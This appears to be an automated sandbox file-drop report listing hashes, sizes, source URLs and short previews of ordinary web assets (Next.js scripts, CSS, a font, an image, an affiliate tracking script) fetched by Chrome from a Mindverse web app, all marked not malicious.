                                      SSDEEP:96:jRQeCGN+R/LARL/teCGXk6ByOK2405bCmqEwZWqPWqas1054oELI/IMXgLqTs6:lHCo+R/LAtV/kk6Ij2r5bCmqZdd10SoN
                                      MD5:D88016243C4CBE5B346A12DF4862AE56
                                      SHA1:3D3106D522E8DE92003A1BA11C5026907DC1BA6B
                                      SHA-256:C5372F7B915EC8B5DE42825F6977561E37B296256764279BE374067311A529A0
                                      SHA-512:58E644AD0B503634CCADE52DE5B521172CCBC3E8EC3D3A9AD31543C85F3842F766492658EDC7A6EF6ECD8F3CFDC9028098D4BBB3C5A6DB17EE99D0683A752839
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(layout)/(PALayout)/memory/detail/page-8b4f18c2e436e066.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5189],{8638:function(e,t,n){Promise.resolve().then(n.bind(n,84778))},16463:function(e,t,n){"use strict";var o=n(71169);n.o(o,"usePathname")&&n.d(t,{usePathname:function(){return o.usePathname}}),n.o(o,"useRouter")&&n.d(t,{useRouter:function(){return o.useRouter}}),n.o(o,"useSearchParams")&&n.d(t,{useSearchParams:function(){return o.useSearchParams}}),n.o(o,"useSelectedLayoutSegment")&&n.d(t,{useSelectedLayoutSegment:function(){return o.useSelectedLayoutSegment}}),n.o(o,"useSelectedLayoutSegments")&&n.d(t,{useSelectedLayoutSegments:function(){return o.useSelectedLayoutSegments}}),n.o(o,"useServerInsertedHTML")&&n.d(t,{useServerInsertedHTML:function(){return o.useServerInsertedHTML}})},84778:function(e,t,n){"use strict";n.r(t);var o=n(57437),r=n(16463),a=n(2265),i=n(22465),s=n(10433);let u=a.lazy(()=>Promise.all([n.e(8719),n.e(242),n.e(3106),n.e(8905),n.e(2853),n.e(8725),n.e(315),n.e(9369),n.e(8795),n.e(3882),n.e(7064),n.e(7487),n.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:TrueType Font data, 17 tables, 1st "GDEF", 15 names, Microsoft, language 0x409
                                      Category:downloaded
                                      Size (bytes):207640
                                      Entropy (8bit):6.071801319053319
                                      Encrypted:false
                                      SSDEEP:3072:sN5j0BkrhFfR+nInDW3dXwf/W9qSPK0mXVZ2MZb3OtcPKQG9NrEDAKAV:sN5InO38W7r6twd4SAbV
                                      MD5:5A328E5B4288152C0B9D52E0A74B5598
                                      SHA1:14035C6703E7980699C923775412CF30D940CCA0
                                      SHA-256:1E83173C637E89433813843BA74EDD27F88E6CA52887467FF4FC5C33A8D48FC1
                                      SHA-512:62D9EAFEBD666677DE1D52083C3CAEE8EB4592510EC707A37C84830EAAFE620DFB16D85426F0F835579F3DE6217B81C9811B37626A4691943F9B2AEA2F86ADF4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1739343109720/202403231711175425123Calistoga-Regular.ttf
                                      Preview:............GDEFfe`....,...8GPOS\U........o^GSUB..B...6.....OS/2x.l........`cmap..."... ....cvt ...........lfpgmb..}... ....gasp............glyf.d....j...Q.head!F,....h...6hhea.(.E...D...$hmtx..5|..(,....loca..3p........maxp...Q...$... name.V.c...d...2post.....I... .prepZ..;...l...................a.........,.Z........................................................S.v~_.<..........o ......v.....t...................L.........X...K...X...^.9..................P. {........STC................. .............. ...................................................@.........@.....G.G...........B...........-.}.}.).)...".....K...RX....Y.......cp...B..+...*...B.0. .....*...B.4.(.....*...B..@.@......*...B..@.@.@....*.....D.$..QX.@.X....dD.(..QX....X.....DY..'..QX......@.cTX.....DYYYYY.2.".....*..........D..d..DD............^...........4.....................k.q...s.~.............".................................D.6.(. .......I.M.........f.......h.............l.............k.......o......._...a......
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (18563)
                                      Category:downloaded
                                      Size (bytes):18631
                                      Entropy (8bit):5.204385989931853
                                      Encrypted:false
                                      SSDEEP:384:PLExv60IOUhZVezJOQ/IIy/8O89TSU2GzXL:oxenezJunJOTSU2M
                                      MD5:E50F32C339DC736AB3BBE8A3D0F1BFBE
                                      SHA1:FDEA578F173F0F46231330A137B9774BFDFE9462
                                      SHA-256:E3876926BE3B7F41A72DBD7298FB4204E37F52589E10FD2A8A8F665DC0DCF0AA
                                      SHA-512:52A4D2F8FD7F6E4727B3F354B146AEC5EBAFBDC89F9B984C7445A9F22B7A961332C775CC54BAE9A7816E448212CFD1EB16693AF5F6A3515513F1A484BE9C3B61
                                      Malicious:false
                                      Reputation:low
                                      URL:https://r.wdfl.co/rw.js
                                      Preview:/*! Build 66adaa1f113dc197a3eb3ed30eff581965d72b43:1741260707417 */.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="https://cdn.getrewardful.com/pa
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (27776)
                                      Category:dropped
                                      Size (bytes):41024
                                      Entropy (8bit):5.29629742401833
                                      Encrypted:false
                                      SSDEEP:384:BIaHW5CK6pV04ZoucBbDETMj1eEYGVgMrRI9yTqY:Ga25ZsW4ZouGVXG9yTp
                                      MD5:2D10E25A5D4ED9DCE32D14D0A401E1BB
                                      SHA1:6FFB3E670E544E171C2BA70D588D83681D68F20E
                                      SHA-256:EEB5C426287613384913E51760B1CCCDAF1DB160BC76F685BF4091AE20474B86
                                      SHA-512:1806654F44EB26EA5F6E362CD8DD76A39371D19F26D06B24CBC8CADDC604144860ABF2E76CA157405A89D56F98C78D752367823B277D01F0F74ACD04D28719BB
                                      Malicious:false
                                      Reputation:low
                                      Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta charSet="utf-8"/><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" as="image" href="/default_logo.svg"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/956ae0c8c2c0bec5.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/d09834458b1597d8.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/sta
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):66065
                                      Entropy (8bit):5.302329306531194
                                      Encrypted:false
                                      SSDEEP:1536:y5Q4FwZV7kG+h1JHCaFcfRMsvePPn1CiDqM5lX34PTGQJSb9:y5RFwZV7kG+h1JHCaFcfRMsvePPn1CiL
                                      MD5:B39388B34DA9B77232F0DA7D7F3F1227
                                      SHA1:0C948933E98E8B94F213C8FEAADFFCE50AD7A295
                                      SHA-256:27B123DCC1D8E4B0072763755964ED424A39B095B202B7A59C4CEAD2EDF017DA
                                      SHA-512:7C4DB0B859B109BCE327E0F3B36FC5DD5FE6998663BDA5EDBFE6BD9734FE8ABE602D5359A58326B63F07B520778F7935537C20E9EACA41FF9AEB69D30D256B13
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css
                                      Preview::root{--background:0 0% 100%;--foreground:222.2 84% 4.9%;--card:0 0% 100%;--card-foreground:222.2 84% 4.9%;--popover:0 0% 100%;--popover-foreground:222.2 84% 4.9%;--primary:247 81% 67%;--primary-foreground:210 40% 98%;--secondary:210 40% 96.1%;--secondary-foreground:222.2 47.4% 11.2%;--muted:30 17% 91%;--muted-foreground:215.4 16.3% 46.9%;--accent:210 40% 96.1%;--accent-foreground:222.2 47.4% 11.2%;--destructive:0 84.2% 60.2%;--destructive-foreground:210 40% 98%;--border:214.3 31.8% 91.4%;--input:30 17% 91%;--ring:247 81% 67%;--radius:0.5rem}*{border-color:hsl(var(--border))}*,:after,:before{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-gradient-from-position: ;--tw-gradient-via-position: ;--tw-gradient-to-position: ;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spac
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (12996)
                                      Category:downloaded
                                      Size (bytes):18274
                                      Entropy (8bit):5.304712016413535
                                      Encrypted:false
                                      SSDEEP:96:dy+cz20pvj2j5NgeujJHAml0S352/5BACD0cTWSVHc6sFlZiurvci4FxrKEbNE0W:dyzpSrCemJ3AvhjJ3Av/E1UgG
                                      MD5:795D53111BD26F7B17E08BC4B1C3AA73
                                      SHA1:3DB7197142204726200D0A2937B23E4D254D53E5
                                      SHA-256:DF0EE884E90BF75F8FB925FAFEB0953A1CC34058AAFDDDE50A76497A8C0C3DB5
                                      SHA-512:6834DCD536837F2B64C1A9BFD1C7EE265B0DCFCDE25EEBAB3BE504F6CD4EE0EF000112DDF07DDD833E2591D4DB39CAB52669C229B7F1FFDDDFA3B32D23E9BB43
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/?_rsc=1m3fu
                                      Preview:2:I[66513,[],"ClientPageRoot"].3:I[54404,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","6313","static/chunks/app/(layout)/(PALayout)/home/page-7286f55068b8b827.js"],"default",1].4:I[39275,[],""].5:I[61343,[],""].6:I[13165,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","7487","static/chunks/49a1bf4b-d76374957333b5fc.js","595","static/chunks/595-09c9610e33be8fcc.js","5681","static/chunks/5681-43d82f1a3d805e0d.js","3122","static/chunks/3122-1f6938ed37fcf02d.js","4653","static/chunks/4653-73048479d8c69d09.js","6219","static/chunks/6219-1457be36132bf9c6.js","1073","static/chunks/1073-e4f77f384144a1c4.js","9818","static/chunks/9818-2cef5ca4ed1a1e3a.js","6701","static/chunks/6701-3887d30af462f285.js","9578","static/chunks/9578-a4316cb78831d4a3.js","4059","static/chunks/4059-ff6b23f1a12feb76.js","1025","static/chunks/1025-e8953ee90888594c.js","4595","static/chunks/4595-19c1c19690f67e9a.js","3927","static/chunks/3927-bc012ff258351a6d.js","4871","static/chunks/4871-53f67f62764665d5.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:low
                                      Preview:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (4011), with no line terminators
                                      Category:downloaded
                                      Size (bytes):4011
                                      Entropy (8bit):5.13025205894107
                                      Encrypted:false
                                      SSDEEP:96:ulStnPmoa3yla31N3/p3jAEUTzWZ/3liKlvzkyDK9ZWg+WlV:uYlUZdSogXlV
                                      MD5:3FB996EC7454172434462A01B5F926B6
                                      SHA1:3F77AE3821F543FFAE3B6F065B2FE91336C17604
                                      SHA-256:572205891358C66085D7C316407B8D19B882BD57A3D20119F0EAF16DF595A994
                                      SHA-512:8F7466681A8A456A9B2C9E86309CAF0FC8590884A378048084189EA86F669978AA3D696B0937D097239F07700960141F41B958027AD6C30B3BEF6DCB79F6443F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/4a3ac64c738d5f48.css
                                      Preview:.index_Maxed__LlP2y{background:linear-gradient(272deg,rgba(185,63,255,.49) -1%,#ed9849 101%)}.index_popBlock__OveQG{display:flex;flex-direction:column;gap:10px;padding:16px 24px;color:#756c5d;font-size:12px;border:2px solid #f0ebe5;border-radius:12px}.index_popBlock__OveQG .index_title__9LNuk{color:#160a0a;font-weight:500;font-size:15px;font-family:Calistoga-Regular,sans-serif;line-height:24px}.index_popBlock__OveQG .index_littleTitle__kSzjT{color:#160a0a;font-weight:500;font-size:14px;line-height:22px}.index_popBlock__OveQG ul{margin-bottom:0!important;padding-left:15px!important}.index_popBlock__OveQG li{margin-bottom:0!important}.index_container__Z9gh7{position:relative;box-sizing:border-box;width:280px;height:376px;padding:0 20px 12px;overflow-y:scroll;text-align:center;border-radius:16px}.index_container__Z9gh7::-webkit-scrollbar{display:none}.index_container__Z9gh7 .index_tag__8SFXi{position:relative;width:142px;height:28px;margin:0 auto;color:var(--primary-black);font-weight:700
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (29936), with no line terminators
                                      Category:downloaded
                                      Size (bytes):29936
                                      Entropy (8bit):5.812239809139478
                                      Encrypted:false
                                      SSDEEP:384:MKj5xVsPJSstpnbOfdia9Qr4oXVpY7J9ox4cwGTFEfn+uxhiTJytEzdzAMamU46I:Dfft9S4oXVpY7cwGTFePtEzdK9XqV
                                      MD5:EB0AA041CFB6BD8EB83984C18280E820
                                      SHA1:20969EB1F0E464B9AF04555AD3963219D97FE09A
                                      SHA-256:125206446800E21F0417B331F75B16ECF2DC1763EA192BBA1890F8F07BA930B7
                                      SHA-512:97D6A277AF61287114722EF1ED131130CCB66EF21D35E30E4D12F0B57031D6939B4A0ECF6A0FA00CDE843DF494DE711DF6E84F03F3CCF9D7A8C3C880BB951212
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/114-d3df8482d6fc925d.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[114],{42480:function(){},62678:function(){},25819:function(){},24112:function(){},32532:function(e,t,r){"use strict";var n=r(4410);function _(){return(_=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}t.Z=function(e){return n.createElement("svg",_({xmlns:"http://www.w3.org/2000/svg","data-name":"\\u56FE\\u5C42 1",viewBox:"0 0 1024 1024"},e),n.createElement("path",{d:"M187.16 132.85 345.6 291.29V192c0-2.52.25-5.02.74-7.49s1.22-4.87 2.19-7.2c.96-2.33 2.15-4.54 3.55-6.64 1.4-2.1 2.99-4.04 4.78-5.82 1.78-1.78 3.72-3.37 5.82-4.78 2.1-1.4 4.31-2.58 6.64-3.55 2.33-.96 4.73-1.69 7.2-2.19 2.47-.49 4.97-.74 7.49-.74s5.02.25 7.49.74c2.47.49 4.87 1.22 7.2 2.19 2.33.96 4.54 2.15 6.64 3.55 2.1 1.4 4.04 2.99 5.82 4.78 1.78 1.78 3.37 3.72 4.78 5.82 1.4 2.1 2.58 4.31 3.55 6.64.96 2.33 1.69 4.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 160 x 160, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):18906
                                      Entropy (8bit):7.967991230839252
                                      Encrypted:false
                                      SSDEEP:384:KTDO1fVTUj0JkBaxuXEOfHsUNABl6WajJLFdZa7S1BPc68zKPShyiUWVcmJvyYJ:wO1f1U4e4IXEOl0G5b1K6EKaOWbJ
                                      MD5:28EEFC88A0059189BF2403FF740CF67B
                                      SHA1:A07B36ED349A76F4D21B8029E5ED21070441DFF0
                                      SHA-256:FE90E26CC41ACAECEF066A5A18602275BEF8BBA92C9453AD61A326C936456630
                                      SHA-512:188232EC70F6825E62645AD350938FBF27C21BD720EB73147A5F96A243081E1C8D1F3CA8D31BDDB287A51C592D3774A0854598D7BA7255E5FCC56607AA632BF5
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR...............g-....sRGB.........sBIT....|.d... .IDATx..{.fWY'.{.[U.J.Tq..@.b....).{-P$..{...Q...$........j.&..?.].dt.i..(.-w.q2:R.x[.......*.$.........?.s.{.....*......=g.}.9...{.{.........=..DY.o`..vK.n..`...@..:..p..a0...A....A..cQ..m;....y....'+1.N.......]..n0...7...(I.........](.......~.':/.....y'.'......2.."b....}1."<..R..."...S@y..}`..}_/.|J....n,.{...({...P.p....*qRSL.3eP.@b..*..t..1...).@.....o.....M...~{..A.;.N..!l......P.$...i?6m...O....Wa.....D..X..b>..........v.z.r.T..-j....3..3....>U..y.@.c.Q.....hW.f,.B^.j..@..-.(4..z..[....$%`&P.@j-....`.......K...n...`l.....7f.....j.6j...!..C....n...`d.hp.}&..vL.....y.@..n`..(2.E..A'VZB.....l....u..i.`.D....A."2d.W0.m.X.O..t.m.o#..d...........A.<U....-/z....5..Im..t..n..."h..p..z$-.[qG........i....\...O.iu.9..P Z,/......mf-.;..Q..32.,(...c.S.B)O=.V.W ......6.9.@>}.*.o.a....4......]f...=....W.........j....#.y....##..G.t=m.r.z...N.......W..<...Mg.....-.P...f..1...({.........Tk.$5.:V
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5245), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5245
                                      Entropy (8bit):5.3405643022038225
                                      Encrypted:false
                                      SSDEEP:96:9v+Oxot5y4eRTKJOKOjwX//i/tPqOlkeTJ4+mZDRJFgF4XfkFcMyK14AdOmUsJ:9vdgPOTgOKiwP/i/V/qs4LDR2vybq
                                      MD5:F66DF87F81ED3219033713369F137EF4
                                      SHA1:7A99822DC24B495BF4CC7E0B629AEC125FAAD119
                                      SHA-256:6AC9DA3D5FB47D6C671DFA8C00B9CD30A3D9456E65278BB850ABDD5C82F37DC7
                                      SHA-512:D326344D534A0E03CC777692C707E8659FC86D82B5188AA949588C37699E4DF5D8AD0610E113435442BD2112B7F1FC7861A536A3427D73DB507F707F11A6000D
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/2973-d52b6c4a073fa583.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2973],{12973:function(e,t,n){n.d(t,{V9:function(){return Z},Df:function(){return p},EN:function(){return A}});var r=n(2265),a=n.t(r,2),c=n(42897),i=n(83627),o=n(94597),u=n(39373),h=n(82546),l=n(84179),s=n(12475),f=function(){function e(t){(0,h.Z)(this,e),(0,s.Z)(this,"instanceId",void 0),(0,s.Z)(this,"cache",new Map),this.instanceId=t}return(0,l.Z)(e,[{key:"get",value:function(e){return this.cache.get(e.join("%"))||null}},{key:"update",value:function(e,t){var n=e.join("%"),r=t(this.cache.get(n));null===r?this.cache.delete(n):this.cache.set(n,r)}}]),e}(),d=["children"],v="data-css-hash",y="__cssinjs_instance__";function p(){var e=Math.random().toString(12).slice(2);if("undefined"!=typeof document&&document.head&&document.body){var t=document.body.querySelectorAll("style[".concat(v,"]"))||[],n=document.head.firstChild;Array.from(t).forEach(function(t){t[y]=t[y]||e,t[y]===e&&document.head.insertBefore(t,n)});var r={};Ar
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (2560), with no line terminators
                                      Category:downloaded
                                      Size (bytes):2560
                                      Entropy (8bit):5.3283939538367395
                                      Encrypted:false
                                      SSDEEP:48:iblUlN3kx4O0jV3oXmisM7WvNWrO0jVvPJ46KUF/7E1AYT1ku18A6TU3Wl:XfdjV3oXmisM6lUdjVvPKnUdI1AYDL3Q
                                      MD5:C7ED3605308D52F9F587ADD9456E41AB
                                      SHA1:A95913A1FEADED46680EFCF8F4D8DB976454F98D
                                      SHA-256:9AF9661BE097E935A54B3529DA25EC690BF5A376B3A6CF80EAADBDB92D4630F9
                                      SHA-512:9663A6BE24455A7E22CD6757853699A970EF35E778C02D1AEFD1B40852FC67AC4DB35938D9CD8588DE595A5C76815C2AE1802832801231BC59EBE99DCD40083B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/4b1a69f1-da174b537a3b105c.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8252],{50798:function(e,t,r){var a,n,i,l;function o(e,t){if(!e){"undefined"!=typeof console&&console.warn(t);try{throw Error(t)}catch(e){}}}function c(e,t){void 0===t&&(t={});let r=e;r.endsWith("*")&&"*"!==r&&!r.endsWith("/*")&&(o(!1,'Route path "'+r+'" will be treated as if it were "'+r.replace(/\*$/,"/*")+'" because the `*` character must always follow a `/` in the pattern. To get rid of this warning, please change the route path to "'+r.replace(/\*$/,"/*")+'".'),r=r.replace(/\*$/,"/*"));let a=r.startsWith("/")?"/":"",n=e=>null==e?"":"string"==typeof e?e:String(e);return a+r.split(/\/+/).map((e,r,a)=>{if(r===a.length-1&&"*"===e)return n(t["*"]);let i=e.match(/^:(\w+)(\??)$/);if(i){let[,e,r]=i,a=t[e];return!function(e,t){if(!1===e||null==e)throw Error(t)}("?"===r||null!=a,'Missing ":'+e+'" param'),n(a)}return e.replace(/\?$/g,"")}).filter(e=>!!e).join("/")}function s(e,t){var r,a,n;let i,l;"string"==typeof e&&(e={pa
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (13805), with no line terminators
                                      Category:downloaded
                                      Size (bytes):13813
                                      Entropy (8bit):5.5223186550088
                                      Encrypted:false
                                      SSDEEP:192:GZnOANx+gJkKRW1BHWh8nrRWXb7Zp9FXLXqpF20RuGuglw6:onhJkWW1hMy9WLNp9FXLXqpF20RurgB
                                      MD5:89D2A460A5B4261E2ACE0C1FEFEE84BA
                                      SHA1:7AF3F7FE2CED2D0072CF74E34CE4246F67001C09
                                      SHA-256:5D29C23A6A2EE0C4CA5689AD68483C11EE3A186B4B8D0D5A4E1E023A8EC31432
                                      SHA-512:5F9061E0370DFC2610EDDE8D5A7CFD739415FAD5572066C760675C58A23DB045934E3CFAB46571A9A94E020590A4ED396079879F6DB4B51AA8365F4EFCA911D6
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(nolayout)/login/page-8c894cabcf8ca401.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7513],{73147:function(e,t,a){Promise.resolve().then(a.bind(a,53383))},22310:function(e,t,a){"use strict";a.d(t,{Z:function(){return s}});var i=a(20039);function s(e,t){let a=(0,i.U)("_MINDVERSE_TRACKER_REPORT_EXPOSE_");a&&a(e,t)}},53383:function(e,t,a){"use strict";a.r(t),a.d(t,{default:function(){return M}});var i=a(57437),s=a(14871),o=a(9772),n=a.n(o),r=a(66648),l=a(16463),c=a(2265),d=a(17834),g=a(69087),m=a.n(g),p=function(e){let{headerItem:t}=e,{icon:a,title:s,description:o}=t;return(0,i.jsx)("div",{className:m().wrapper,children:(0,i.jsxs)("div",{className:m().container,children:[(0,i.jsx)("div",{className:m().icon,children:(0,i.jsx)("img",{src:a,alt:"header icon"})}),(0,i.jsx)("h1",{className:m().title,children:s}),(0,i.jsx)("div",{className:m().description,children:o})]})})},u=a(28441),x=a(81648),h=a(64671),_=a(47835),v=a(35544),f=a(58515),b=a(60429);class j{constructor(){this.setItem=(e,t,a)=>{let i={data:t,time:Date.now(
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (23059), with no line terminators
                                      Category:downloaded
                                      Size (bytes):23059
                                      Entropy (8bit):5.6272721978715685
                                      Encrypted:false
                                      SSDEEP:384:F96Qd6w80aXt4nXU/HsXzAkoKsRhsxMCDO9PyvJVT8/PPVvoce1GVdSkbGgS+HG:2ok/H46bVCDO9PyvJ8v5VSj
                                      MD5:EC3814FCB21162B313B4D68F45C4535C
                                      SHA1:1F546FB0FE3FE1E106568A5F3AA1A1685EA76078
                                      SHA-256:1B8135A5F90BDE7DAEE687402F4AB5AB9B69B7B857F2257599DAD00E9AEA61B6
                                      SHA-512:5A614428DFCFFADFB1C4A9672C96A91A618009674A4DCE936D01CA18B6684A4D3EB9E97875E6D6FB2C4F2056A7CAE5073B9CBC91E747E9A940C660D144540FD4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/8181-8964559bf2accdf5.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8181],{45762:function(e,n,t){"use strict";var a,o=t(4410);function r(){return(r=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var a in t)Object.prototype.hasOwnProperty.call(t,a)&&(e[a]=t[a])}return e}).apply(this,arguments)}n.Z=function(e){return o.createElement("svg",r({xmlns:"http://www.w3.org/2000/svg","data-name":"\\u56FE\\u5C42 1",viewBox:"0 0 1024 1024"},e),a||(a=o.createElement("path",{d:"M511.99 255.96v76.37c0 19.2 23.04 28.59 36.27 14.93L667.3 228.22c8.53-8.53 8.53-21.76 0-30.29L548.26 78.89c-13.23-13.23-36.27-3.84-36.27 15.36v76.37c-188.59 0-341.33 152.75-341.33 341.33 0 44.37 8.53 87.04 24.32 125.87 11.52 28.59 48.21 36.27 69.97 14.51 11.52-11.52 16.21-29.01 9.81-44.37-12.37-29.44-18.77-62.29-18.77-96 0-141.23 114.77-256 256-256Zm247.04 115.63c-11.52 11.52-16.21 29.44-9.81 44.37 11.95 29.87 18.77 62.29 18.77 96 0 141.23-114.77 256-256 256v-76.37c0-19.2-23.04-
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):282421
                                      Entropy (8bit):5.629657292453513
                                      Encrypted:false
                                      SSDEEP:3072:G/ZrUJKyW8gJGw7jq3oWMAwTedhj0Z7qfa7txk0BIu3nCtLNpnp:vzw7gR4ewKGje2nQp
                                      MD5:3B6FA70137B1B03F53AED80D5D017E88
                                      SHA1:B4DC337422ECAEFD20CA4C5CBED7F6896F2E752F
                                      SHA-256:3169795B10B96957FC1C68FEC1E82C195F62FA6C52EC58B13349D1FD83EF4D25
                                      SHA-512:4C9CE6C9AA32E24842A032D588CACD1CB26C4D030EA630AA30098D3466D38BDC7F36F81F19194E1DC136FB81BD60174543FF6ECAEDDCF9D891783E9D19E021A4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/4140-a49af68507401e6d.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4140],{60101:function(e,t,n){"use strict";var a,s,r=n(4410);function o(){return(o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a])}return e}).apply(this,arguments)}t.Z=function(e){return r.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 1024 1024"},e),a||(a=r.createElement("defs",null,r.createElement("clipPath",{id:"Fill_check_svg__a"},r.createElement("path",{fill:"none",d:"M66.92 59.35h890.15v905.29H66.92z"})))),s||(s=r.createElement("g",{clipPath:"url(#Fill_check_svg__a)"},r.createElement("path",{fillRule:"evenodd",d:"M512 964.65q10.92 0 21.84-.55t21.79-1.64q10.86-1.08 21.68-2.71t21.52-3.8q10.71-2.18 21.31-4.87t21.06-5.93q10.45-3.23 20.74-7t20.38-8q10.09-4.26 20-9t19.52-10q9.63-5.24 19-11t18.46-11.89q9.09-6.18 17.86-12.79t17.22-13.67q8.45-7 16.54-14.51t15.83-15.32q7.72-7.86 15.06-16.0
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
